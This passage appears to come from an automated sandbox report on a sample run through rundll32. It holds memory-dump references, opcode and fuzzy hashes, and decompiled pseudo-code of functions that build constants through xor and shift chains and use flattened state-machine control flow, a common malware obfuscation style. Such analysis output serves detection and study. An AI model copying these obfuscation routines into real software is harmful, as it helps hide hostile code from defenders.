                                                                                                                      0x0017ecea
                                                                                                                      0x0017ecf1
                                                                                                                      0x0017ecf8
                                                                                                                      0x0017ecfc
                                                                                                                      0x0017ed03
                                                                                                                      0x0017ed0a
                                                                                                                      0x0017ed11
                                                                                                                      0x0017ed18
                                                                                                                      0x0017ed22
                                                                                                                      0x0017ed27
                                                                                                                      0x0017ed2c
                                                                                                                      0x0017ed33
                                                                                                                      0x0017ed3a
                                                                                                                      0x0017ed41
                                                                                                                      0x0017ed48
                                                                                                                      0x0017ed4c
                                                                                                                      0x0017ed53
                                                                                                                      0x0017ed5e
                                                                                                                      0x0017ed5f
                                                                                                                      0x0017ed62
                                                                                                                      0x0017ed69
                                                                                                                      0x0017ed70
                                                                                                                      0x0017ed7b
                                                                                                                      0x0017ed7e
                                                                                                                      0x0017ed85
                                                                                                                      0x0017ed8c
                                                                                                                      0x0017ed93
                                                                                                                      0x0017ed9a
                                                                                                                      0x0017eda1
                                                                                                                      0x0017edad
                                                                                                                      0x0017edb0
                                                                                                                      0x0017edb7
                                                                                                                      0x0017edba
                                                                                                                      0x0017edc0
                                                                                                                      0x0017edd5
                                                                                                                      0x0017edda
                                                                                                                      0x0017ede7
                                                                                                                      0x0017edfb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7GG%
                                                                                                                      • API String ID: 0-3444672964
                                                                                                                      • Opcode ID: 67213d0398122c332fb1127b40eed38b5183a67bcdaa070641fd5e009b8b9aa1
                                                                                                                      • Instruction ID: 197519e42ce5ff7423823914888ccc77b0ab1ec4f301c95adfac82792490d164
                                                                                                                      • Opcode Fuzzy Hash: 67213d0398122c332fb1127b40eed38b5183a67bcdaa070641fd5e009b8b9aa1
                                                                                                                      • Instruction Fuzzy Hash: 9541EFB1C01219AFCB08CFE5C98A9DEBBB1FB48314F208199D511BA260C7B51A46CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00183512 Relevance: 1.3, Strings: 1, Instructions: 64COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00183512(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t83;
				void* _t88;

				_v36 = _v36 & 0x00000000;
				_v48 = 0xd3138f;
				_v44 = 0xbafb06;
				_v40 = 0xb4c902;
				_v28 = 0x9a00a8;
				_v28 = _v28 + 0xffff4980;
				_v28 = _v28 + 0xffff4b07;
				_v28 = _v28 ^ 0x00989527;
				_v12 = 0x37fcba;
				_v12 = _v12 + 0xffff1054;
				_v12 = _v12 ^ 0xaae49dfe;
				_v12 = _v12 | 0x5520ddcc;
				_v12 = _v12 ^ 0xfff3c0c4;
				_v8 = 0xafb0cb;
				_t88 = __ecx;
				_t83 = 0x7b;
				_v8 = _v8 / _t83;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffff2cb4;
				_v8 = _v8 ^ 0x0b6cc095;
				_v24 = 0x7eb81c;
				_v24 = _v24 | 0x606632c5;
				_v24 = _v24 + 0x73a0;
				_v24 = _v24 * 0x3c;
				_v24 = _v24 ^ 0x9dca2ad3;
				_v20 = 0x11602;
				_v20 = _v20 * 0x5d;
				_v20 = _v20 + 0xd70f;
				_v20 = _v20 + 0x91d0;
				_v20 = _v20 ^ 0x006b4c23;
				_v32 = 0x7d7f;
				_v32 = _v32 + 0x7879;
				_v32 = _v32 ^ 0x000fb411;
				_v16 = 0xa8b2e1;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0xffff543c;
				_v16 = _v16 ^ 0xd60d7738;
				_v16 = _v16 ^ 0x29f40b7c;
				return E00177A47(_v28, _v24, _v20, E00185BB3(), _t88, _v32, _v16);
			}
















                                                                                                                      0x00183518
                                                                                                                      0x0018351e
                                                                                                                      0x00183525
                                                                                                                      0x0018352c
                                                                                                                      0x00183533
                                                                                                                      0x0018353a
                                                                                                                      0x00183541
                                                                                                                      0x00183548
                                                                                                                      0x0018354f
                                                                                                                      0x00183556
                                                                                                                      0x0018355d
                                                                                                                      0x00183564
                                                                                                                      0x0018356b
                                                                                                                      0x00183572
                                                                                                                      0x0018357d
                                                                                                                      0x00183581
                                                                                                                      0x00183584
                                                                                                                      0x00183587
                                                                                                                      0x0018358b
                                                                                                                      0x00183592
                                                                                                                      0x00183599
                                                                                                                      0x001835a0
                                                                                                                      0x001835a7
                                                                                                                      0x001835b2
                                                                                                                      0x001835b5
                                                                                                                      0x001835bc
                                                                                                                      0x001835c7
                                                                                                                      0x001835ca
                                                                                                                      0x001835d1
                                                                                                                      0x001835d8
                                                                                                                      0x001835df
                                                                                                                      0x001835e6
                                                                                                                      0x001835ed
                                                                                                                      0x001835f4
                                                                                                                      0x001835fb
                                                                                                                      0x001835ff
                                                                                                                      0x00183606
                                                                                                                      0x0018360d
                                                                                                                      0x0018363c

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #Lk
                                                                                                                      • API String ID: 0-1139186034
                                                                                                                      • Opcode ID: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction ID: 2bd8adb0fdbbe258e697774c4166b324dc99057942f906292a36b343b0bb04a4
                                                                                                                      • Opcode Fuzzy Hash: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction Fuzzy Hash: 0831CDB1C0131EABCB58CFA5C94A1EEBBB5FF14318F208188D515B6260D3B91B45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017FD8C Relevance: .2, Instructions: 164COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E0017FD8C() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				short _t136;
				short _t138;
				signed int _t141;
				signed int _t144;
				void* _t145;
				void* _t146;
				intOrPtr _t164;
				void* _t165;
				short* _t166;
				short* _t167;
				void* _t168;
				short* _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t174;

				_t164 =  *0x19520c; // 0x0
				_v8 = 0xafc848;
				_t165 = _t164 + 0x220;
				_t146 = 0xaad6b4c;
				_t170 = 0xc;
				_v8 = _v8 / _t170;
				_v8 = _v8 ^ 0xeddef8c6;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0edbb261;
				_v16 = 0xa05fce;
				_v16 = _v16 + 0x102e;
				_v16 = _v16 + 0x8702;
				_v16 = _v16 ^ 0x00a5637b;
				_v48 = 0xdd0656;
				_v48 = _v48 >> 2;
				_v48 = _v48 ^ 0x00330133;
				_v24 = 0x8dacbc;
				_t144 = 0x5c;
				_t171 = 0x3d;
				_v24 = _v24 * 0x19;
				_v24 = _v24 / _t144;
				_v24 = _v24 ^ 0x00283487;
				_v20 = 0x519264;
				_t145 = 2;
				_v20 = _v20 * 0x67;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x41a5f983;
				_v32 = 0xc0edbc;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdc023425;
				_v28 = 0xb6ecb7;
				_v28 = _v28 * 0x1e;
				_v28 = _v28 + 0x349f;
				_v28 = _v28 ^ 0x156255f9;
				_v36 = 0x8be990;
				_v36 = _v36 | 0x6444358b;
				_v36 = _v36 * 0x59;
				_v36 = _v36 ^ 0x0c402a41;
				_v52 = 0xcdd122;
				_v52 = _v52 ^ 0xde2c2ef8;
				_v52 = _v52 ^ 0xdee78ce8;
				_v40 = 0xa1b7cb;
				_v40 = _v40 ^ 0x66c9ba9b;
				_v40 = _v40 + 0xffffb195;
				_v40 = _v40 ^ 0x666fdaad;
				_v56 = 0x9437d4;
				_v56 = _v56 / _t171;
				_v56 = _v56 ^ 0x00087e9b;
				_v12 = 0x6793e4;
				_v12 = _v12 << 2;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000c2cdf;
				_v44 = 0x8cb917;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 << 6;
				_v44 = _v44 ^ 0x00016464;
				do {
					while(_t146 != 0xa09253) {
						if(_t146 == 0x53e5fac) {
							_t172 = E0017EF71(4, 0x10);
							_push(_t172);
							_push(_v56);
							_push(_t165);
							E00175A07(1, _v40);
							_t174 = _t174 + 0x14;
							_t167 = _t165 + _t172 * 2;
							_t146 = 0xa09253;
							_t136 = 0x2e;
							 *_t167 = _t136;
							_t165 = _t167 + _t145;
							continue;
						} else {
							if(_t146 == 0xaad6b4c) {
								_t138 = E00175AE2(_t146);
								_t146 = 0xd305119;
								continue;
							} else {
								if(_t146 == 0xd305119) {
									_t141 = E0017EF71(4, 0x10);
									_push(1);
									_push(_v20);
									_push(_t165);
									_t173 = _t141;
									E00175A07(_t145, _v24);
									_push(_t173);
									_push(_v28);
									_t168 = _t165 + _t145;
									_push(_t168);
									E00175A07(1, _v32);
									_t174 = _t174 + 0x20;
									_t169 = _t168 + _t173 * 2;
									_t146 = 0x53e5fac;
									_t138 = 0x5c;
									 *_t169 = _t138;
									_t165 = _t169 + _t145;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(3);
					_push(_v44);
					_push(_t165);
					E00175A07(1, _v12);
					_t166 = _t165 + 6;
					_t174 = _t174 + 0xc;
					_t146 = 0xc2dacde;
					 *_t166 = 0;
					_t165 = _t166 + _t145;
					L9:
				} while (_t146 != 0xc2dacde);
				return _t138;
			}

































                                                                                                                      0x0017fd95
                                                                                                                      0x0017fd9d
                                                                                                                      0x0017fda4
                                                                                                                      0x0017fdad
                                                                                                                      0x0017fdb4
                                                                                                                      0x0017fdb9
                                                                                                                      0x0017fdbe
                                                                                                                      0x0017fdc5
                                                                                                                      0x0017fdc9
                                                                                                                      0x0017fdd0
                                                                                                                      0x0017fdd7
                                                                                                                      0x0017fdde
                                                                                                                      0x0017fde5
                                                                                                                      0x0017fdec
                                                                                                                      0x0017fdf3
                                                                                                                      0x0017fdf7
                                                                                                                      0x0017fdfe
                                                                                                                      0x0017fe09
                                                                                                                      0x0017fe0c
                                                                                                                      0x0017fe0f
                                                                                                                      0x0017fe19
                                                                                                                      0x0017fe1c
                                                                                                                      0x0017fe23
                                                                                                                      0x0017fe2e
                                                                                                                      0x0017fe2f
                                                                                                                      0x0017fe32
                                                                                                                      0x0017fe35
                                                                                                                      0x0017fe3c
                                                                                                                      0x0017fe47
                                                                                                                      0x0017fe4a
                                                                                                                      0x0017fe4e
                                                                                                                      0x0017fe55
                                                                                                                      0x0017fe60
                                                                                                                      0x0017fe63
                                                                                                                      0x0017fe6a
                                                                                                                      0x0017fe71
                                                                                                                      0x0017fe78
                                                                                                                      0x0017fe83
                                                                                                                      0x0017fe86
                                                                                                                      0x0017fe8d
                                                                                                                      0x0017fe94
                                                                                                                      0x0017fe9b
                                                                                                                      0x0017fea2
                                                                                                                      0x0017fea9
                                                                                                                      0x0017feb0
                                                                                                                      0x0017feb7
                                                                                                                      0x0017febe
                                                                                                                      0x0017feca
                                                                                                                      0x0017fecd
                                                                                                                      0x0017fed4
                                                                                                                      0x0017fedb
                                                                                                                      0x0017fedf
                                                                                                                      0x0017fee3
                                                                                                                      0x0017fee7
                                                                                                                      0x0017feee
                                                                                                                      0x0017fef5
                                                                                                                      0x0017fef9
                                                                                                                      0x0017fefd
                                                                                                                      0x0017ff04
                                                                                                                      0x0017ff04
                                                                                                                      0x0017ff16
                                                                                                                      0x0017ff92
                                                                                                                      0x0017ff96
                                                                                                                      0x0017ff97
                                                                                                                      0x0017ff9e
                                                                                                                      0x0017ff9f
                                                                                                                      0x0017ffa4
                                                                                                                      0x0017ffa7
                                                                                                                      0x0017ffaa
                                                                                                                      0x0017ffb1
                                                                                                                      0x0017ffb2
                                                                                                                      0x0017ffb5
                                                                                                                      0x00000000
                                                                                                                      0x0017ff18
                                                                                                                      0x0017ff1e
                                                                                                                      0x0017ff77
                                                                                                                      0x0017ff7c
                                                                                                                      0x00000000
                                                                                                                      0x0017ff20
                                                                                                                      0x0017ff26
                                                                                                                      0x0017ff36
                                                                                                                      0x0017ff3b
                                                                                                                      0x0017ff3d
                                                                                                                      0x0017ff45
                                                                                                                      0x0017ff46
                                                                                                                      0x0017ff48
                                                                                                                      0x0017ff4d
                                                                                                                      0x0017ff4e
                                                                                                                      0x0017ff56
                                                                                                                      0x0017ff59
                                                                                                                      0x0017ff5a
                                                                                                                      0x0017ff5f
                                                                                                                      0x0017ff62
                                                                                                                      0x0017ff65
                                                                                                                      0x0017ff6c
                                                                                                                      0x0017ff6d
                                                                                                                      0x0017ff70
                                                                                                                      0x00000000
                                                                                                                      0x0017ff70
                                                                                                                      0x0017ff26
                                                                                                                      0x0017ff1e
                                                                                                                      0x00000000
                                                                                                                      0x0017ff16
                                                                                                                      0x0017ffbc
                                                                                                                      0x0017ffbe
                                                                                                                      0x0017ffc6
                                                                                                                      0x0017ffc8
                                                                                                                      0x0017ffcd
                                                                                                                      0x0017ffd2
                                                                                                                      0x0017ffd5
                                                                                                                      0x0017ffda
                                                                                                                      0x0017ffdd
                                                                                                                      0x0017ffdf
                                                                                                                      0x0017ffdf
                                                                                                                      0x0017fff1

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1437f762ded743c4eaa28960bede06ad194c179e7b03f47ccb61cd84c5c8ac1
                                                                                                                      • Instruction ID: bb29131ccd6ec5376ea6537a7c4faa6074d1cec406285f9b1780ff89ab6ff776
                                                                                                                      • Opcode Fuzzy Hash: e1437f762ded743c4eaa28960bede06ad194c179e7b03f47ccb61cd84c5c8ac1
                                                                                                                      • Instruction Fuzzy Hash: 50615775D01209ABDB08DFA4C88A9EEFBB1FF44314F208159E216BB290D7B51A45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018E498 Relevance: .1, Instructions: 113COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E0018E498(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v68;
				intOrPtr _v72;
				char _v592;
				void* _t122;
				signed int _t137;
				signed int _t138;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t122);
				_v72 = 0xec580c;
				asm("stosd");
				_t137 = 0x76;
				asm("stosd");
				asm("stosd");
				_v48 = 0xa71dc1;
				_v48 = _v48 << 0x10;
				_v48 = _v48 ^ 0x1dc99f4e;
				_v8 = 0x906d24;
				_v8 = _v8 | 0x748f1c77;
				_v8 = _v8 + 0xffff13d2;
				_v8 = _v8 * 0x4a;
				_v8 = _v8 ^ 0xb5d1b34d;
				_v32 = 0x99e404;
				_v32 = _v32 ^ 0xe9d0d5f4;
				_v32 = _v32 + 0x5a31;
				_v32 = _v32 ^ 0xe94bd9b5;
				_v16 = 0xd98a19;
				_v16 = _v16 + 0xffff99bf;
				_v16 = _v16 + 0x1a5b;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x64f05351;
				_v40 = 0x441d8c;
				_v40 = _v40 + 0xbe9c;
				_t138 = 0x7a;
				_v40 = _v40 / _t137;
				_v40 = _v40 ^ 0x00086b18;
				_v20 = 0xfc7ad5;
				_v20 = _v20 + 0x78e5;
				_v20 = _v20 + 0xffff6dfc;
				_v20 = _v20 + 0xa8d2;
				_v20 = _v20 ^ 0x00f25a11;
				_v44 = 0xb09661;
				_v44 = _v44 << 2;
				_v44 = _v44 + 0x5c70;
				_v44 = _v44 ^ 0x02c80175;
				_v12 = 0xc44555;
				_v12 = _v12 | 0x8aaf582b;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x8e0d3178;
				_v12 = _v12 ^ 0x9f5e57b0;
				_v36 = 0x15e160;
				_v36 = _v36 << 7;
				_v36 = _v36 * 0x45;
				_v36 = _v36 ^ 0xf2df9ca5;
				_v24 = 0xe11875;
				_v24 = _v24 + 0xffffa15f;
				_v24 = _v24 / _t138;
				_v24 = _v24 ^ 0x000fcfe6;
				_v56 = 0xedc19c;
				_v56 = _v56 | 0x5ad96a0a;
				_v56 = _v56 ^ 0x5af69f46;
				_v52 = 0x112c39;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x00831cf8;
				_v28 = 0xaa6b89;
				_v28 = _v28 >> 4;
				_v28 = _v28 + 0xffff7c23;
				_v28 = _v28 ^ 0x00029c7f;
				_push(_v16);
				_push(_v32);
				_push(0x1712a4);
				E00173BF8(_v20, _v28, E0017AB66(_v48, _v8, _v28), _v44, _v12,  &_v592, _a8);
				E0017AE03(_v36, _v24, _v56, _t131);
				return E0017BAB0( &_v592, _v52, _v28);
			}






















                                                                                                                      0x0018e4a3
                                                                                                                      0x0018e4a6
                                                                                                                      0x0018e4a9
                                                                                                                      0x0018e4aa
                                                                                                                      0x0018e4ab
                                                                                                                      0x0018e4b0
                                                                                                                      0x0018e4be
                                                                                                                      0x0018e4c1
                                                                                                                      0x0018e4c4
                                                                                                                      0x0018e4c5
                                                                                                                      0x0018e4c6
                                                                                                                      0x0018e4cd
                                                                                                                      0x0018e4d1
                                                                                                                      0x0018e4d8
                                                                                                                      0x0018e4df
                                                                                                                      0x0018e4e6
                                                                                                                      0x0018e4f1
                                                                                                                      0x0018e4f4
                                                                                                                      0x0018e4fb
                                                                                                                      0x0018e502
                                                                                                                      0x0018e509
                                                                                                                      0x0018e510
                                                                                                                      0x0018e517
                                                                                                                      0x0018e51e
                                                                                                                      0x0018e525
                                                                                                                      0x0018e52c
                                                                                                                      0x0018e530
                                                                                                                      0x0018e537
                                                                                                                      0x0018e53e
                                                                                                                      0x0018e54a
                                                                                                                      0x0018e54b
                                                                                                                      0x0018e550
                                                                                                                      0x0018e557
                                                                                                                      0x0018e55e
                                                                                                                      0x0018e565
                                                                                                                      0x0018e56c
                                                                                                                      0x0018e573
                                                                                                                      0x0018e57a
                                                                                                                      0x0018e581
                                                                                                                      0x0018e585
                                                                                                                      0x0018e58c
                                                                                                                      0x0018e593
                                                                                                                      0x0018e59a
                                                                                                                      0x0018e5a1
                                                                                                                      0x0018e5a5
                                                                                                                      0x0018e5ac
                                                                                                                      0x0018e5b3
                                                                                                                      0x0018e5ba
                                                                                                                      0x0018e5c2
                                                                                                                      0x0018e5c5
                                                                                                                      0x0018e5cc
                                                                                                                      0x0018e5d3
                                                                                                                      0x0018e5df
                                                                                                                      0x0018e5e2
                                                                                                                      0x0018e5e9
                                                                                                                      0x0018e5f0
                                                                                                                      0x0018e5f7
                                                                                                                      0x0018e5fe
                                                                                                                      0x0018e605
                                                                                                                      0x0018e609
                                                                                                                      0x0018e610
                                                                                                                      0x0018e617
                                                                                                                      0x0018e61b
                                                                                                                      0x0018e622
                                                                                                                      0x0018e629
                                                                                                                      0x0018e62c
                                                                                                                      0x0018e62f
                                                                                                                      0x0018e65b
                                                                                                                      0x0018e66a
                                                                                                                      0x0018e688

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3ad7b2180658afa6c34edebf7f19fca63a8f6d5b34160e4f4caaaad06a34eaad
                                                                                                                      • Instruction ID: f3738f2b60bbe2386af911e70b959df76fe3fb98c6c6dc7af5ac73e74ad5b838
                                                                                                                      • Opcode Fuzzy Hash: 3ad7b2180658afa6c34edebf7f19fca63a8f6d5b34160e4f4caaaad06a34eaad
                                                                                                                      • Instruction Fuzzy Hash: 7D5112B2D0130DEBCF04DFA5C94A8DEBBB2FB58314F208198E41576260D7B91A09CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001768DE Relevance: .1, Instructions: 73COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
